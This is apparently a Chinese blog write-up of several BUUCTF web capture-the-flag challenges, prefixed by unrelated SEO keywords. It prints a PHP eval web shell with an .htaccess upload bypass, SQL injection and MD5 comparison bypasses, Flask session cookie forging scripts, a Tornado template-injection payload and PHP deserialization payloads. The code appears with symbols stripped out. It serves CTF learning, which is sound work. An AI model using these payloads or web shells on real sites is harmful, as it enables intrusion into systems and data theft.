网站访问者qq,黄骅做网站的电话,企业建设网站需注意哪些事项,卧龙区建网站文章目录 [极客大挑战 2019]BuyFlag[BJDCTF2020]Easy MD5[HCTF 2018]admin第一种方法 直接登录第二种方法 flack session伪造第三种方法Unicode欺骗 [MRCTF2020]你传你#x1f40e;呢[护网杯 2018]easy_tornadoSSTI注入 [ZJCTF 2019]NiZhuanSiWei [极客大挑战 2019]BuyFlag
一… 文章目录 [极客大挑战 2019]BuyFlag[BJDCTF2020]Easy MD5[HCTF 2018]admin第一种方法 直接登录第二种方法 flack session伪造第三种方法Unicode欺骗 [MRCTF2020]你传你呢[护网杯 2018]easy_tornadoSSTI注入 [ZJCTF 2019]NiZhuanSiWei [极客大挑战 2019]BuyFlag
一个高级的网页先进行信息收集一下 可以看到买到flag需要满足三个条件
然后抓包一下 可以看到user0,所以可以猜测user1时满足学生的身份 然后进行POST传参数
因为password不能为数字,但是又要满足和404弱比较相等
所以password404a
直接传入money100000000错误可以将money改成数组或者将这个数字用科学计数法表示1e9 [BJDCTF2020]Easy MD5 可以在文件头中找到线索抓包也可以 select * from admin where passwordmd5($pass,true)这也是个sql注入语句执行了我们的查询但是在通过where的时候条件不匹配
需要passwordmd5($pass,true)为真时才会执行select * from admin
看一下md5的语法因为后面是TRUE,所以将其转化成原始的16字符二进制形式 Stringmd5()函数会将我们输入的值加密然后转换成16字符的二进制格式,如果转换后的值为or xxxx,只要我们or后面的值恒为真那么这个式子就恒为真
因为这个sql语句就变成select * from admin where password or xxxx
按照这个思路找到ffifdyop
ffifdyop的变化如 前几位是or 6可以构成永真式
前面那个sql语句就变成了
select * from admin where passwordor6]!r,b 跳到新的页面了
!--
$a $GET[a];
$b $_GET[b];if($a ! $b md5($a) md5($b)){// wow, glzjin wants a girl friend.
--简单用数组绕过就行?a[]1b[]2
?php
error_reporting(0);
include flag.php;highlight_file(__FILE__);if($_POST[param1]!$_POST[param2]md5($_POST[param1])md5($_POST[param2])){echo $flag;
}还是用数组绕过POST传参就行param1[]1param2[]2
得到flag这个第一关有点点抽象嗷
[HCTF 2018]admin
[BUUCTF-HCTF 2018]admin1_[hctf 2018]admin 1-CSDN博客
第一种方法 直接登录
可以直接用弱口令
当注册admin用户的时候发现已经被注册过了 所以我们可以直接去登陆界面试一试
用用常见的弱口令
什么admin或者是amdin123就行了
用密码进行爆破
实用 | 如何利用 Burp Suite 进行密码爆破-腾讯云开发者社区-腾讯云 (tencent.com) 所以密码为123
第二种方法 flack session伪造
https://github.com/woadsl1234/hctf_flask
先注册一个新账号然后登陆进去在change password那一页查看源代码发现https://github.com/woadsl1234/hctf_flask/还是要仔细一点才好真的没看见QAQ 好像访问不到这个文件了所以记录一下这个做题思路吧
sessionession 可以看做是在不同的请求之间保存数据的方法因为 HTTP 是无状态的协议但是在业务应用上我们希望知道不同请求是否是同一个人发起的。比如购物网站在用户点击进入购物车的时候服务器需要知道是哪个用户执行了这个操作。
flask是非常轻量级的web框架其session存储在客户端中可以通过HTTP请求头Cookie字段的session获取且仅对session进行了签名缺少数据防篡改实现易产生安全漏洞
按着解题步骤先做一遍吧我也不是很懂
先获取session 解密脚本如下
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decodedef decryption(payload):payload, sig payload.rsplit(b., 1)payload, timestamp payload.rsplit(b., 1)decompress Falseif payload.startswith(b.):payload payload[1:]decompress Truetry:payload base64_decode(payload)except Exception as e:raise Exception(Could not base64 decode the payload because of an exception)if decompress:try:payload zlib.decompress(payload)except Exception as e:raise Exception(Could not zlib decompress the payload before decoding the payload)return session_json_serializer.loads(payload)if __name__ __main__:print(decryption(sys.argv[1].encode())) {_fresh: True, _id: be8a4a01afc13593d5413ad88e4b91a6c9a4c0f847466911adc8310046b8d5c779d649ee606aa2c4fe47cb23dbb6b3794ef6a40f5598ec1925879fd72e817ea21, csrf_token: b9a841f3e188cfa34052bb98af17ae6ce8e7263ce, image: bOyeb, name: admin1, user_id: 10}
将name的admin1改成admin伪造一个新的session,需要密钥ckj123
加密脚本为可以去noraj/flask-session-cookie-manager: Flask Session Cookie Decoder/Encoder (github.com)下载下来
#!/usr/bin/env python3Flask Session Cookie Decoder/Encoder
__author__ Wilson Sumanang, Alexandre ZANNI# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast# Abstract Base Classes (PEP 3119)
if sys.version_info[0] 3: # 3.0raise Exception(Must be using at least Python 3)
elif sys.version_info[0] 3 and sys.version_info[1] 4: # 3.0 3.4from abc import ABCMeta, abstractmethod
else: # 3.4from abc import ABC, abstractmethod# Lib for argument parsing
import argparse# external Imports
from flask.sessions import SecureCookieSessionInterfaceclass MockApp(object):def __init__(self, secret_key):self.secret_key secret_keyif sys.version_info[0] 3 and sys.version_info[1] 4: # 3.0 3.4class FSCM(metaclassABCMeta):def encode(secret_key, session_cookie_structure): Encode a Flask session cookie try:app MockApp(secret_key)session_cookie_structure dict(ast.literal_eval(session_cookie_structure))si SecureCookieSessionInterface()s si.get_signing_serializer(app)return s.dumps(session_cookie_structure)except Exception as e:return [Encoding error] {}.format(e)raise edef decode(session_cookie_value, secret_keyNone): Decode a Flask cookie try:if(secret_keyNone):compressed Falsepayload session_cookie_valueif payload.startswith(.):compressed Truepayload payload[1:]data payload.split(.)[0]data base64_decode(data)if compressed:data zlib.decompress(data)return dataelse:app MockApp(secret_key)si SecureCookieSessionInterface()s si.get_signing_serializer(app)return s.loads(session_cookie_value)except Exception as e:return [Decoding error] {}.format(e)raise e
else: # 3.4class FSCM(ABC):def encode(secret_key, session_cookie_structure): Encode a Flask session cookie try:app MockApp(secret_key)session_cookie_structure dict(ast.literal_eval(session_cookie_structure))si SecureCookieSessionInterface()s si.get_signing_serializer(app)return s.dumps(session_cookie_structure)except Exception as e:return [Encoding error] {}.format(e)raise edef decode(session_cookie_value, secret_keyNone): Decode a Flask cookie try:if(secret_keyNone):compressed Falsepayload session_cookie_valueif payload.startswith(.):compressed Truepayload payload[1:]data payload.split(.)[0]data base64_decode(data)if compressed:data zlib.decompress(data)return dataelse:app MockApp(secret_key)si SecureCookieSessionInterface()s si.get_signing_serializer(app)return s.loads(session_cookie_value)except Exception as e:return [Decoding error] {}.format(e)raise eif __name__ __main__:# Args are only relevant for __main__ usage## Description for helpparser argparse.ArgumentParser(descriptionFlask Session Cookie Decoder/Encoder,epilogAuthor : Wilson Sumanang, Alexandre ZANNI)## prepare sub commandssubparsers parser.add_subparsers(helpsub-command help, destsubcommand)## create the parser for the encode commandparser_encode subparsers.add_parser(encode, helpencode)parser_encode.add_argument(-s, --secret-key, metavarstring,helpSecret key, requiredTrue)parser_encode.add_argument(-t, --cookie-structure, metavarstring,helpSession cookie structure, requiredTrue)## create the parser for the decode commandparser_decode subparsers.add_parser(decode, helpdecode)parser_decode.add_argument(-s, --secret-key, metavarstring,helpSecret key, requiredFalse)parser_decode.add_argument(-c, --cookie-value, metavarstring,helpSession cookie value, requiredTrue)## get argsargs parser.parse_args()## find the option chosenif(args.subcommand encode):if(args.secret_key is not None and args.cookie_structure is not None):print(FSCM.encode(args.secret_key, args.cookie_structure))elif(args.subcommand decode):if(args.secret_key is not None and args.cookie_value is not None):print(FSCM.decode(args.cookie_value,args.secret_key))elif(args.cookie_value is not None):print(FSCM.decode(args.cookie_value))
应该算是伪造出来了吧 第三种方法Unicode欺骗
一题三解之2018HCTFadmin-安全客 - 安全资讯平台 (anquanke.com)
[MRCTF2020]你传你呢
先写个一句话木马
?php
eval($_POST[cmd]);
?上传一下php文件发现上传失败了
抓个包修改一下文件后缀以及MIME的信息发现成功上传这是个黑名单绕过以及MIME检测 可以用.htaccess文件上传
.htaccess上传绕过文件上传黑名单
Apache服务器允许在每个目录下存在一个名为.htaccess的文件.htaccess是一个纯文本文件该文件可以作为Apache辅助配置文件仅在当前目录生效。.htaccess文件可以实现URL重写、自定义错误页面、MIME类型配置以及权限访问控制等。起到了伪静态应用、图片防盗链、自定义404错误页面、允许或阻止特定IP地址范围访问、目录浏览与主页、禁止访问指定文件类型以及文件密码保护等等的作用。先生成一个.htaccess文件里面写入
FilesMatch shell
SetHandler application/x-httpd-php
/FilesMatch
SetHandler表示将文件名中含有shell的文件作为PHP类型的文件来执行先上传这个.htaccess文件抓包改一下MIME的信息 然后再将filename后面的名字改成shell.png 用蚁剑连接这个地址
网站的地址加上upload/1a66b931be20e9deb49ea4a0750addeb/shell.png [护网杯 2018]easy_tornado
打开题目可以看到三个超链接 将其分别打开看看知道flag在fllllllllllllag文件下 第二个提示了一个render 第三个得到了一个md5值的加密 可以知道第三个肯定是关键
然后注意一下上面的网址filehash应该就是将其进行hash加密也就是第三个信息所提示的
所以推测payloud为file?filenamefllllllllllllagfilehashxxx
通过第三个我们知道要找到cookie_secret
题目是easy_tornado知道tornado是python的一个函数可以看出这道题是模板注入类的题
SSTI注入
SSTI就是服务器端模板注入(Server-Side Template Injection)也给出了一个注入的概念。服务端模板相当于很多公式根据变量输出结果。这里的模板就是模板引擎根据数据自动生成前端页面。常见的注入有SQL 注入XSS 注入XPATH 注入XML
注入代码注入命令注入等等。sql注入已经出世很多年了对于sql注入的概念和原理很多人应该是相当清楚了SSTI也是注入类的漏洞其成因其实是可以类比于sql注入的。sql注入是从用户获得一个输入然后又后端脚本语言进行数据库查询所以可以利用输入来拼接我们想要的sql语句当然现在的sql注入防范做得已经很好了然而随之而来的是更多的漏洞。SSTI也是获取了一个输入然后在后端的渲染处理上进行了语句的拼接然后执行。错误的执行了用户输入。类比于 sql
注入。当然还是和sql注入有所不同的SSTI利用的是现在的网站模板引擎(下面会提到)主要针对python、php、java的一些网站处理框架比如Python的jinja2
mako tornado djangophp的smarty twigjava的jade
velocity。当这些框架对运用渲染函数生成html的时候会出现SSTI的问题。render()是tornado里的函数可以生成html模板。是一个渲染函数是一个公式能输出前端页面的公式
tornado是用Python编写的Web服务器兼Web应用框架 模板注入必须通过传输型如{{xxx}}的执行命令 修改一下上面的hash值 error?msgError
发现报错了 当我们输入error?msg{{1}}就可以得到回显说明此处是存在SSTI注入漏洞的
error?msg{{7*7}} 可以猜测此处出现了过滤
在tornado模板中存在一些可以访问的快速对象,这里用到的是handler.settingshandler 指向RequestHandler而RequestHandler.settings又指向self.application.settings所以handler.settings就指向RequestHandler.application.settings了这里面就是我们的一些环境变量。简单理解handler.settings即可可以把它理解为tornado模板中内置的环境配置信息名称通过handler.settings可以访问到环境配置的一些信息看到tornado模板基本上可以通过handler.settings一把梭。得到了cookie_secret为bc3ae934-dc62-4c44-ab54-f0eba8296feb
将 /fllllllllllllagmd5加密为3bf9f6cf685a6dd8defadabfb41a03a1
bc3ae934-dc62-4c44-ab54-f0eba8296feb3bf9f6cf685a6dd8defadabfb41a03a1
加密后为321c7aacb726b4c54ec10de61e89b837
payloud为?filename/fllllllllllllagfilehash321c7aacb726b4c54ec10de61e89b837 [ZJCTF 2019]NiZhuanSiWei
?php
$text $_GET[text];
$file $_GET[file];
$password $_GET[password];
if(isset($text)(file_get_contents($text,r)welcome to the zjctf)){echo brh1.file_get_contents($text,r)./h1/br;if(preg_match(/flag/,$file)){echo Not now!;exit(); }else{include($file); //useless.php$password unserialize($password);echo $password;}
}
else{highlight_file(__FILE__);
}
?考的伪协议
这篇写的很好欸PHP伪协议总结 - 个人文章 - SegmentFault 思否
先代码审计一下
file_get_contents将整个文件写入字符串
可以使用php://input也可以使用data伪协议这两个都可以用于执行php代码
data伪协议主要用于数据流的读取。如果传入的是php代码则可以执行
data伪协议?textdata://text/plain,welcome to the zjctf
成功绕过 (preg_match(/flag/,$file))是正则匹配式匹配到flag就自动退出提示了有个useless.php所以用php伪协议来读取
?textdata://text/plain,welcome to the zjctffilephp://filter/readconvert.base64-encode/resourceuseless.php绕过了第二层 base解密
?php class Flag{ //flag.php public $file; public function __tostring(){ if(isset($this-file)){ echo file_get_contents($this-file); echo br;return (U R SO CLOSE !///COME ON PLZ);} }
}
?
在本地进行序列化操作
?phpclass Flag{ //flag.phppublic $fileflag.php;public function __tostring(){if(isset($this-file)){echo file_get_contents($this-file);echo br;return (U R SO CLOSE !///COME ON PLZ);}}
}
$anew Flag();
echo serialize($a);
?得到O:4:Flag:1:{s:4:file;s:8:flag.php;}
最后的Payloud为?textdata://text/plain,welcome to the zjctffileuseless.phppasswordO:4:Flag:1:{s:4:file;s:8:flag.php;} 查看页面源代码得到flag
